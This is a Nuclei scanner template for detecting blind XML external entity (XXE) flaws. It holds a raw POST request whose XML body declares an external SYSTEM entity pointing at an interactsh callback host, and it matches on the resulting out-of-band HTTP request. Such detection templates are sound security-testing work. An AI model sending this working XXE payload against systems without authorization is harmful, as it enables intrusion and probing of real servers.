nuclei-templates/http/vulnerabilities/generic/generic-blind-xxe.yaml

id: generic-blind-xxe

info:
  name: Generic Blind XXE
  author: geeknik
  severity: high
  description: This template detects Generic Blind XXE.
  metadata:
    max-request: 1
  tags: xxe,generic,blind

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Referer: {{BaseURL}}

        <?xml version="1.0"?>
        <!DOCTYPE foo SYSTEM "http://{{interactsh-url}}">
        <foo>&e1;</foo>        

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4a0a004730450221009f57c234b06aeb89aa80bfae1c0d85972a7973ee948314fc288ec8aea57e55d2022006410f6df0c005505c1e9981aa48c612d380b1502ac805d11c3506fed6fc85c0:922c64590222798bb761d5b6d8e72950